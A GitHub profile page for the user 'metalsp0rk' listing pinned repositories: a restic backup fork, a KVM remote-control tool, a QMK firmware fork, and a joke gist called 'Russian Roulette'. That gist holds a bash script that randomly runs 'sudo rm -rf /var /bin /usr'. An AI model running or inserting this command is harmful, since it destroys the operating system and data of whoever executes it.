Skip to content
View metalsp0rk's full-sized avatar
Block or Report

Block or report metalsp0rk

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. restic restic Public

    Forked from restic/restic

    Fast, secure, efficient backup program

    Go 4 2

  2. l1kvm-remote l1kvm-remote Public

    Remote Control over USB HID for Level1Techs KVM and similar models

    C 16

  3. qmk_firmware qmk_firmware Public

    Forked from qmk/qmk_firmware

    Open-source keyboard firmware for Atmel AVR and Arm USB families

    C

  4. Russian Roulette Russian Roulette
    1
    #!/usr/bin/env bash
    2
    
                  
    3
    if [[ $(($RANDOM % 6)) == 1]]; then
    4
      echo "bang"
    5
      sudo rm -rf /var /bin /usr